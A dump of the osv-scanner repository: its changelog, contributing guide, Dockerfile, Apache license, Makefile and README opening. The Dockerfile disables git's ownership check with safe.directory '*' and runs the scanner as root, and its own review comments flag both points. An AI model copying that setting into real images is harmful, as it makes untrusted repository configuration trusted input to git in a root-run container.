- [Bug #922](https://github.com/google/osv-scanner/issues/922) Support filtering on alias IDs in Guided Remediation. # v1.7.2: ### Fixes: - [Bug #899](https://github.com/google/osv-scanner/issues/899) Guided Remediation: Parse paths in npmrc auth fields correctly. - [Bug #908](https://github.com/google/osv-scanner/issues/908) Fix rust call analysis by explicitly disabling stripping of debug info. - [Bug #914](https://github.com/google/osv-scanner/issues/914) Fix regression for go call analysis introduced in 1.7.0. # v1.7.1: (There is no Github release for this version) ### Fixes - [Bug #856](https://github.com/google/osv-scanner/issues/856) Add retry logic to make calls to OSV.dev API more resilient. This combined with changes in OSV.dev's API should result in far fewer timeout errors. ### API Features - [Feature #781](https://github.com/google/osv-scanner/pull/781) add `MakeVersionRequestsWithContext()` - [Feature #857](https://github.com/google/osv-scanner/pull/857) API and networking related errors now have their own error and exit code (Exit Code 129) # v1.7.0: ### Features - [Feature #352](https://github.com/google/osv-scanner/issues/352) Guided Remediation Introducing our new experimental guided remediation feature on `osv-scanner fix` subcommand. See our [docs](https://google.github.io/osv-scanner/experimental/guided-remediation/) for detailed usage instructions. - [Feature #805](https://github.com/google/osv-scanner/pull/805) Include CVSS MaxSeverity in JSON output. ### Fixes - [Bug #818](https://github.com/google/osv-scanner/pull/818) Align GoVulncheck Go version with go.mod. - [Bug #797](https://github.com/google/osv-scanner/pull/797) Don't traverse gitignored dirs for gitignore files. ### Miscellaneous - [#831](https://github.com/google/osv-scanner/pull/831) Remove version number from the release binary name. # v1.6.2: ### Features - [Feature #694](https://github.com/google/osv-scanner/pull/694) Add subcommands! OSV-Scanner now has subcommands! 
The base command has been moved to `scan` (currently the only commands is `scan`). By default if you do not pass in a command, `scan` will be used, so CLI remains backwards compatible. This is a building block to adding the guided remediation feature. See [issue #352](https://github.com/google/osv-scanner/issues/352) for more details! - [Feature #776](https://github.com/google/osv-scanner/pull/776) Add pdm lockfile support. ### API Features - [Feature #754](https://github.com/google/osv-scanner/pull/754) Add dependency groups to flattened vulnerabilities output. # v1.6.0: ### Features - [Feature #694](https://github.com/google/osv-scanner/pull/694) Add support for NuGet lock files version 2. - [Feature #655](https://github.com/google/osv-scanner/pull/655) Scan and report dependency groups (e.g. "dev dependencies") for vulnerabilities. - [Feature #702](https://github.com/google/osv-scanner/pull/702) Created an option to skip/disable upload to code scanning. - [Feature #732](https://github.com/google/osv-scanner/pull/732) Add option to not fail on vulnerability being found for GitHub Actions. - [Feature #729](https://github.com/google/osv-scanner/pull/729) Verify the spdx licenses passed in to the license allowlist. ### Fixes - [Bug #736](https://github.com/google/osv-scanner/pull/736) Show ecosystem and version even if git is shown if the info exists. - [Bug #703](https://github.com/google/osv-scanner/pull/703) Return an error if both license scanning and local/offline scanning is enabled simultaneously. - [Bug #718](https://github.com/google/osv-scanner/pull/718) Fixed parsing of SBOMs generated by the latest CycloneDX. - [Bug #704](https://github.com/google/osv-scanner/pull/704) Get go stdlib version from go.mod. ### API Features - [Feature #727](https://github.com/google/osv-scanner/pull/727) Changes to `Reporter` methods to add verbosity levels and to deprecate functions. 
# v1.5.0: ### Features - [Feature #501](https://github.com/google/osv-scanner/pull/501) Add experimental license scanning support! See https://osv.dev/blog/posts/introducing-license-scanning-with-osv-scanner/ for more information! - [Feature #642](https://github.com/google/osv-scanner/pull/642) Support scanning `renv` files for the R language ecosystem. - [Feature #513](https://github.com/google/osv-scanner/pull/513) Stabilize call analysis for Go! The experimental `--experimental-call-analysis` flag has now been updated to: ``` --call-analysis=<language/all> --no-call-analysis=<language/all> ``` with call analysis for Go enabled by default. See https://google.github.io/osv-scanner/usage/#scanning-with-call-analysis for the documentation! - [Feature #676](https://github.com/google/osv-scanner/pull/676) Simplify return codes: - Return 0 if there are no findings or errors. - Return 1 if there are any findings (license violations or vulnerabilities). - Return 128 if no packages are found. - [Feature #651](https://github.com/google/osv-scanner/pull/651) CVSS v4.0 support. - [Feature #60](https://github.com/google/osv-scanner/pull/60) [Pre-commit hook](https://pre-commit.com/) support. ### Fixes - [Bug #639](https://github.com/google/osv-scanner/issues/639) We now filter local packages from scans, and report the filtering of those packages. - [Bug #645](https://github.com/google/osv-scanner/issues/645) Properly handle file/url paths on Windows. - [Bug #660](https://github.com/google/osv-scanner/issues/660) Remove noise from failed lockfile parsing. - [Bug #649](https://github.com/google/osv-scanner/issues/649) No longer include vendored libraries in C/C++ package analysis. - [Bug #634](https://github.com/google/osv-scanner/issues/634) Fix filtering of aliases to also include non OSV aliases ### Miscellaneous - The minimum go version has been updated to go1.21 from go1.18. 
# v1.4.3: ### Features - [Feature #621](https://github.com/google/osv-scanner/pull/621) Add support for scanning vendored C/C++ files. - [Feature #581](https://github.com/google/osv-scanner/pull/581) Scan submodules commit hashes. ### Fixes - [Bug #626](https://github.com/google/osv-scanner/issues/626) Fix gitignore matching for root directory - [Bug #622](https://github.com/google/osv-scanner/issues/622) Go binary not found should not be an error - [Bug #588](https://github.com/google/osv-scanner/issues/588) handle npm/yarn aliased packages - [Bug #607](https://github.com/google/osv-scanner/pull/607) fix: remove some extra newlines in sarif report # v1.4.2: ### Fixes - [Bug #574](https://github.com/google/osv-scanner/issues/574) Support versions with build metadata in `yarn.lock` files - [Bug #599](https://github.com/google/osv-scanner/issues/599) Add name field to sarif rule output # v1.4.1: ### Features - [Feature #534](https://github.com/google/osv-scanner/pull/534) New SARIF format that separates out individual vulnerabilities, see https://github.com/google/osv-scanner/issues/216 - [Experimental Feature #57](https://github.com/google/osv-scanner/issues/57) Experimental Github Action! Have a look at https://google.github.io/osv-scanner/experimental/ for how to use the new Github Action in your repo. Experimental, so might change with only a minor update. ### API Features - [Feature #557](https://github.com/google/osv-scanner/pull/557) Add new ecosystems, and a slice containing all of them. # v1.4.0: ### Features - [Feature #183](https://github.com/google/osv-scanner/pull/183) Add (experimental) offline mode! See [our documentation](https://google.github.io/osv-scanner/experimental/#offline-mode) for how to use it. - [Feature #452](https://github.com/google/osv-scanner/pull/452) Add (experimental) rust call analysis, detect whether vulnerable functions are actually called in your Rust project! 
See [our documentation](https://google.github.io/osv-scanner/experimental/#call-analysis-in-rust) for limitations and how to use this. - [Feature #484](https://github.com/google/osv-scanner/pull/484) Detect the installed `go` version and checks for vulnerabilities in the standard library. - [Feature #505](https://github.com/google/osv-scanner/pull/505) OSV-Scanner doesn't support your lockfile format? You can now use your own parser for your format, and create an intermediate `osv-scanner.json` for osv-scanner to scan. See [our documentation](https://google.github.io/osv-scanner/usage/#custom-lockfiles) for instructions. ### API Features - [Feature #451](https://github.com/google/osv-scanner/pull/451) The lockfile package now support extracting dependencies directly from any io.Reader, removing the requirement of a file path. ### Fixes - [Bug #457](https://github.com/google/osv-scanner/pull/457) Fix PURL mapping for Alpine packages - [Bug #462](https://github.com/google/osv-scanner/pull/462) Use correct plural and singular forms based on count # v1.3.6: ### Minor Updates - [Feature #431](https://github.com/google/osv-scanner/pull/431) Update GoVulnCheck integration. - [Feature #439](https://github.com/google/osv-scanner/pull/439) Create `models.PURLToPackage()`, and deprecate `osvscanner.PURLToPackage()`. ### Fixes - [Feature #439](https://github.com/google/osv-scanner/pull/439) Fix `PURLToPackage` not returning the full namespace of packages in ecosystems that use them (e.g. golang). # v1.3.5: ### Features - [Feature #409](https://github.com/google/osv-scanner/pull/409) Adds an additional column to the table output which shows the severity if available. 
### API Features - [Feature #424](https://github.com/google/osv-scanner/pull/424) - [Feature #417](https://github.com/google/osv-scanner/pull/417) - [Feature #417](https://github.com/google/osv-scanner/pull/417) - Update the models package to better reflect the osv schema, including: - Add the withdrawn field - Improve timestamp serialization - Add related field - Add additional ecosystem constants - Add new reference types - Add YAML tags # v1.3.4: ### Minor Updates - [Feature #390](https://github.com/google/osv-scanner/pull/390) Add an user agent to OSV API requests. # v1.3.3: ### Fixes - [Bug #369](https://github.com/google/osv-scanner/issues/369) Fix requirements.txt misparsing lines that contain `--hash`. - [Bug #237](https://github.com/google/osv-scanner/issues/237) Clarify when no vulnerabilities are found. - [Bug #354](https://github.com/google/osv-scanner/issues/354) Fix cycle in requirements.txt causing infinite recursion. - [Bug #367](https://github.com/google/osv-scanner/issues/367) Fix panic when parsing empty lockfile. ### API Features - [Feature #357](https://github.com/google/osv-scanner/pull/357) Update `pkg/osv` to allow overriding the http client / transport # v1.3.2: ### Fixes - [Bug #341](https://github.com/google/osv-scanner/pull/341) Make the reporter public to allow calling DoScan with non nil reporters. - [Bug #335](https://github.com/google/osv-scanner/issues/335) Improve SBOM parsing and relaxing name requirements when explicitly scanning with `--sbom`. - [Bug #333](https://github.com/google/osv-scanner/issues/333) Improve scanning speed for regex heavy lockfiles by caching regex compilation. - [Bug #349](https://github.com/google/osv-scanner/pull/349) Improve SBOM documentation and error messages. # v1.3.1: ### Fixes - [Bug #319](https://github.com/google/osv-scanner/issues/319) Fix segmentation fault when parsing CycloneDX without dependencies. 
# v1.3.0: ### Major Features: - [Feature #198](https://github.com/google/osv-scanner/pull/198) GoVulnCheck integration! Try it out when scanning go code by adding the `--experimental-call-analysis` flag. - [Feature #260](https://github.com/google/osv-scanner/pull/198) Support `-r` flag in `requirements.txt` files. - [Feature #300](https://github.com/google/osv-scanner/pull/300) Make `IgnoredVulns` also ignore aliases. - [Feature #304](https://github.com/google/osv-scanner/pull/304) OSV-Scanner now runs faster when there's multiple vulnerabilities. ### Fixes - [Bug #249](https://github.com/google/osv-scanner/issues/249) Support yarn locks with quoted properties. - [Bug #232](https://github.com/google/osv-scanner/issues/232) Parse nested CycloneDX components correctly. - [Bug #257](https://github.com/google/osv-scanner/issues/257) More specific cyclone dx parsing. - [Bug #256](https://github.com/google/osv-scanner/issues/256) Avoid panic when parsing `file:` dependencies in `pnpm` lockfiles. - [Bug #261](https://github.com/google/osv-scanner/issues/261) Deduplicate packages that appear multiple times in `Pipenv.lock` files. - [Bug #267](https://github.com/google/osv-scanner/issues/267) Properly handle comparing zero versions in Maven. - [Bug #279](https://github.com/google/osv-scanner/issues/279) Trim leading zeros off when comparing numerical components in Maven versions. - [Bug #291](https://github.com/google/osv-scanner/issues/291) Check if PURL is valid before adding it to queries. - [Bug #293](https://github.com/google/osv-scanner/issues/293) Avoid infinite loops parsing Maven poms with syntax errors - [Bug #295](https://github.com/google/osv-scanner/issues/295) Set version in the source code, this allows version to be displayed in most package managers. - [Bug #297](https://github.com/google/osv-scanner/issues/297) Support Pipenv develop packages without versions. 
### API Features - [Feature #310](https://github.com/google/osv-scanner/pull/310) Improve the OSV models to allow for 3rd party use of the library. # v1.2.0: ### Major Features: - [Feature #168](https://github.com/google/osv-scanner/pull/168) Support for scanning debian package status file, usually located in `/var/lib/dpkg/status`. Thanks @cmaritan - [Feature #94](https://github.com/google/osv-scanner/pull/94) Specify what parser should be used in `--lockfile`. - [Feature #158](https://github.com/google/osv-scanner/pull/158) Specify output format to use with the `--format` flag. - [Feature #165](https://github.com/google/osv-scanner/pull/165) Respect `.gitignore` files by default when scanning. - [Feature #156](https://github.com/google/osv-scanner/pull/156) Support markdown table output format. Thanks @deftdawg - [Feature #59](https://github.com/google/osv-scanner/pull/59) Support `conan.lock` lockfiles and ecosystem Thanks @SSE4 - Updated documentation! Check it out here: https://google.github.io/osv-scanner/ ### Minor Updates: - [Feature #178](https://github.com/google/osv-scanner/pull/178) Support SPDX 2.3. - [Feature #221](https://github.com/google/osv-scanner/pull/221) Support dependencyManagement section in Maven poms. - [Feature #167](https://github.com/google/osv-scanner/pull/167) Make osvscanner API library public. - [Feature #141](https://github.com/google/osv-scanner/pull/141) Retry OSV API calls to mitigate transient network issues. Thanks @davift - [Feature #220](https://github.com/google/osv-scanner/pull/220) Vulnerability output is ordered deterministically. - [Feature #179](https://github.com/google/osv-scanner/pull/179) Log number of packages scanned from SBOM. - General dependency updates ### Fixes - [Bug #161](https://github.com/google/osv-scanner/pull/161) Exit with non zero exit code when there is a general error. - [Bug #185](https://github.com/google/osv-scanner/pull/185) Properly omit Source from JSON output. 
# v1.1.0: This update adds support for NuGet ecosystem and various bug fixes by the community. - [Feature #98](https://github.com/google/osv-scanner/pull/98): Support for NuGet ecosystem. - [Feature #71](https://github.com/google/osv-scanner/issues/71): Now supports Pipfile.lock scanning. - [Bug #85](https://github.com/google/osv-scanner/issues/85): Even better support for narrow terminals by shortening osv.dev URLs. - [Bug #105](https://github.com/google/osv-scanner/issues/105): Fix rare cases of too many open file handles. - [Bug #131](https://github.com/google/osv-scanner/pull/131): Fix table highlighting overflow. - [Bug #101](https://github.com/google/osv-scanner/issues/101): Now supports 32 bit systems. # v1.0.2 This is a minor patch release to mitigate human readable output issues on narrow terminals (#85). - [Bug #85](https://github.com/google/osv-scanner/issues/85): Better support for narrow terminals. # v1.0.1 Various bug fixes and improvements. Many thanks to the amazing contributions and suggestions from the community! - Feature: ARM64 builds are now also available! - [Feature #46](https://github.com/google/osv-scanner/pull/46): Gradle lockfile support. - [Feature #50](https://github.com/google/osv-scanner/pull/46): Add version command. - [Bug #52](https://github.com/google/osv-scanner/issues/52): Fixes 0 exit code being wrongly emitted when vulnerabilities are present. ================================================ FILE: CONTRIBUTING.md ================================================ # How to Contribute We'd love to accept your patches and contributions to this project. There are just a few small guidelines you need to follow. ## Contributor License Agreement Contributions to this project must be accompanied by a Contributor License Agreement. You (or your employer) retain the copyright to your contribution; this simply gives us permission to use and redistribute your contributions as part of the project. 
Head over to <https://cla.developers.google.com/> to see your current agreements on file or to sign a new one. You generally only need to submit a CLA once, so if you've already submitted one (even if it was for a different project), you probably don't need to do it again. ## Code reviews All submissions, including submissions by project members, require review. We use GitHub pull requests for this purpose. Consult [GitHub Help](https://help.github.com/articles/about-pull-requests/) for more information on using pull requests. When creating a pull request, please use the provided [pull request template](/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md) and fill out the sections to ensure a smooth review process. For any new feature, please create an issue first to discuss the proposed changes before proceeding to make a pull request. This helps ensure that your contribution is aligned with the project's goals and avoids duplicate work. ## Community Guidelines This project follows [Google's Open Source Community Guidelines](https://opensource.google.com/conduct/). ## Contributing documentation Please review the documentation [README](docs/README.md) for more information about contributing to documentation. ## Contributing code ### Prerequisites Install: 1. [Go](https://go.dev/) 1.21+, use `go version` to check. 2. [GoReleaser](https://goreleaser.com/) (Optional, only if you want reproducible builds). > **Note** > > The scripts within `/scripts` expect to be run from the root of the repository ### Building #### Build using only `go` Run the following in the project directory: ```shell ./scripts/build.sh ``` Produces `osv-scanner` binary in the project directory. #### Build using `goreleaser` Run the following in the project directory: ```shell ./scripts/build_snapshot.sh ``` See GoReleaser [documentation](https://goreleaser.com/cmd/goreleaser_build/) for build options.
You can also reproduce the downloadable builds by checking out the specific tag and running `goreleaser build`, using the same Go version as the one used during the actual release (see goreleaser workflows). ### Running tests To run tests: ```shell make test ``` To see a list of all tests and other available Makefile targets, you can run: ```shell make help ``` To get consistent test results, please run with `GOTOOLCHAIN=go`. The `Makefile` defines several modes you can use to change how tests run: - `SNAPS=true`: Update snapshot tests. - `ACC=true`: Run acceptance tests that require additional dependencies. - `SHORT=false`: Run the full test suite instead of the default short suite. - `VCR=<mode>`: Set the VCR recording mode (see below). By default, tests that require additional dependencies beyond the go toolchain are skipped. Enable these tests by running: ```shell make test ACC=true ``` You can generate an HTML coverage report by running: ```shell ./scripts/generate_coverage_report.sh ``` You can regenerate snapshots by running tests with `SNAPS=true`: ```shell make test SNAPS=true ``` Note that some long-running tests may be skipped and their snapshots will not be updated. To update all snapshots, use: ```shell make update-snapshots # Equivalent to: make test SNAPS=true SHORT=false ``` To update all snapshots for all tests, matching the CI test environment, use: ```shell make refresh-all ``` `cmd` tests use [`go-vcr`](https://github.com/dnaeon/go-vcr) to provide a custom `http.Client` for osv.dev requests to the `querybulk` endpoint which uses snapshots of requests called cassettes to reduce noise from changes to advisories while still providing a high degree of confidence. You can control the recording behaviour by passing `VCR=<mode>` as an argument to `make test`.
The `<mode>` can be one of the [supported modes](https://github.com/dnaeon/go-vcr/blob/v4/pkg/recorder/recorder.go#L51), specified either by [its name without the `Mode` suffix or by its int value](./cmd/osv-scanner/internal/testcmd/vcr.go#L16). ```shell # Example: Disable VCR tests to passthrough network requests make test VCR=Passthrough ``` The default mode locally is `ReplayWithNewEpisodes`, meaning existing interactions will be replayed while any new ones will be recorded and added to the existing cassette; when running in CI, the default mode is `ReplayOnly` meaning an error will be raised if an http interaction is missing from a test's cassette. If adding a lockfile with known vulnerabilities for test data, also add an [`osv-scanner.toml`](https://google.github.io/osv-scanner/configuration/) config file to exclude those vulnerabilities from scans of the repository. ### Linting To lint your code, run ```shell ./scripts/run_lints.sh ``` ### Making commits Please follow the [Conventional Commits](https://www.conventionalcommits.org/en/v1.0.0/) specification when squashing commits during a merge. This is typically the commit merged into the main branch and is often based on the PR title. Doing so helps us to automate processes like changelog generation and ensures a clear and consistent commit history. Some types: `feat:`, `fix:`, `docs:`, `chore:`, `refactor:`, and others. ## Contributing documentation Please follow these steps to successfully contribute documentation. 1. Fork the repository. 2. Make desired documentation changes. 3. Preview the changes by spinning up a GitHub page for your fork, building from your working branch. - On your fork, go to the settings tab and then the GitHub page settings.
Sample URL: https://github.com/{your-github-profile}/osv-scanner/settings/pages - Under "Build and deployment" select "Deploy from a branch" - Set the branch to your working branch - Set the github page to build from the "/docs" folder - Hit save and wait for your site to build - Once it is ready, click the link and preview the docs ![Image shows the UI settings for building the GitHub page, which is described in step 3 of the contributing documentation instructions.](docs/images/github-page.png) 4. If you are satisfied with the changes, open a PR. 5. In the PR, link to your fork's GitHub page, so we can preview the changes. For information on how to run the documentation locally, please see our [documentation readme](https://github.com/google/osv-scanner/blob/main/docs/README.md/#running-docs-locally).
================================================
FILE: Dockerfile
================================================
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Build stage: compiles osv-scanner from the source tree copied into /src.
# The base image is referenced by tag and by sha256 digest, so the digest
# fixes the exact image contents that are pulled.
FROM golang:1.26.1-alpine3.23@sha256:2389ebfa5b7f43eeafbd6be0c3700cc46690ef842ad962f6c5bd6be49ed82039 AS builder

WORKDIR /src
# Only the module files are copied before the download step, so this layer
# does not depend on the rest of the source tree.
COPY ./go.mod ./go.sum ./
RUN go mod download

COPY ./ ./
RUN go build -o osv-scanner ./cmd/osv-scanner/

# Runtime stage: digest-pinned Alpine with CA certificates and git installed.
FROM alpine:3.23@sha256:25109184c71bdad752c8312a8623239686a9a2071e8825f20acb8f2198c3f659
# NOTE(review): safe.directory '*' turns off git's repository-ownership check
# for every path in this image. Presumably it is here so git works on
# bind-mounted checkouts owned by a different UID -- confirm. The trade-off is
# that git will honour the configuration of any repository it is pointed at,
# so the contents of scanned directories become trusted input to git; consider
# narrowing the value to the expected mount path.
# NOTE(review): no USER instruction appears in this stage, so the scanner runs
# as the image's default user (root for the stock alpine image) unless the
# caller overrides it at run time.
RUN apk --no-cache add ca-certificates git && \
    git config --global --add safe.directory '*'

# The binary built in the first stage is the only artifact copied across.
WORKDIR /root/
COPY --from=builder /src/osv-scanner .
ENTRYPOINT ["/root/osv-scanner"] ================================================ FILE: LICENSE ================================================ Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). 
"Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. 
Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the 
Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. 
Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. 
To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 
================================================ FILE: Makefile ================================================ export PATH := $(PATH):$(shell go env GOPATH)/bin # Default - run help .DEFAULT_GOAL := help # Defaults for test SHORT ?= true SNAPS ?= false ACC ?= false VCR ?= ReplayWithNewEpisodes help: ## Show this help message @awk 'BEGIN {FS = ":.*##"; printf "\nUsage:\n make \033[36m\033[0m\n"} \ /^[a-zA-Z_0-9-]+:.*?##/ { printf " \033[36m%-20s\033[0m %s\n", $$1, $$2 } \ /^## / { printf " %-20s %s\n", "", substr($$0, 4) }' $(MAKEFILE_LIST) ## Prevents make from trying to interpret the targets as files .PHONY: build scanner lint lint-fix format clean local-docs test update-snapshots refresh-all help build: ## Build scanner scripts/build.sh scanner: ## Run scanner (Usage: make scanner ARGS="") go run ./cmd/osv-scanner $(ARGS) lint: ## Run lints scripts/run_lints.sh lint-fix: ## Run lints and fix scripts/run_lints.sh --fix format: ## Run formatters scripts/run_formatters.sh clean: ## Clean build artifacts rm -f osv-scanner rm -f cmd/osv-scanner/scan/image/testdata/test-*.tar local-docs: ## Run local docs scripts/run_local_docs.sh test: ## Run tests ## Options: ## SNAPS=true Update snapshots (Default: false) ## ACC=true Run acceptance tests (Default: false) ## SHORT=false Run full tests (Default: true) ## VCR=mode VCR mode (Default: ReplayWithNewEpisodes): ## - 0|RecordOnly: Record new cassettes ## - 1|ReplayOnly: Replay cassettes, error if missing ## - 2|ReplayWithNewEpisodes: Replay, record if missing ## - 3|RecordOnce: Record if missing ## - 4|Passthrough: Disable VCR @export TEST_VCR_MODE=$(VCR); \ if [ "$(SNAPS)" = "true" ]; then export UPDATE_SNAPS=true; fi; \ if [ "$(ACC)" = "true" ]; then export TEST_ACCEPTANCE=true; fi; \ ARGS=""; \ if [ "$(SHORT)" = "true" ]; then ARGS="$$ARGS -short"; fi; \ scripts/run_tests.sh $$ARGS update-snapshots: ## Update all snapshots (Equivalent to make test SNAPS=true SHORT=false) $(MAKE) test SNAPS=true SHORT=false refresh-all: 
## Refresh all snaps, matching CI test (Usage: make refresh-all REBUILD_IMAGES=true) @if [ "$(REBUILD_IMAGES)" = "true" ]; then $(MAKE) clean; fi $(MAKE) test ACC=true SHORT=false VCR=RecordOnly SNAPS=true ================================================ FILE: README.md ================================================ --- [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/google/osv-scanner/badge)](https://scorecard.dev/viewer/?uri=github.com/google/osv-scanner) [![Go Report Card](https://goreportcard.com/badge/github.com/google/osv-scanner)](https://goreportcard.com/report/github.com/google/osv-scanner) [![codecov](https://codecov.io/gh/google/osv-scanner/graph/badge.svg?token=C8IDVX9LP5)](https://codecov.io/gh/google/osv-scanner) [![SLSA 3](https://slsa.dev/images/gh-badge-level3.svg)](https://slsa.dev) [![GitHub Release](https://img.shields.io/github/v/release/google/osv-scanner)](https://github.com/google/osv-scanner/releases) Use OSV-Scanner to find existing vulnerabilities affecting your project's dependencies. OSV-Scanner provides an officially supported frontend to the [OSV database](https://osv.dev/) and CLI interface to [OSV-Scalibr](https://github.com/google/osv-scalibr) that connects a project’s list of dependencies with the vulnerabilities that affect them. OSV-Scanner supports a wide range of project types, package managers and features, including but not limited to: - **Languages:** C/C++, Dart, Elixir, Go, Java, Javascript, PHP, Python, R, Ruby, Rust. - **Package Managers:** npm, pip, yarn, maven, go modules, cargo, gem, composer, nuget and others. - **Operating Systems:** Detects vulnerabilities in OS packages on Linux systems. - **Containers:** Scans container images for vulnerabilities in their base images and included packages. - **Guided Remediation:** Provides recommendations for package version upgrades based on criteria such as dependency depth, minimum severity, fix strategy, and return on investment. 
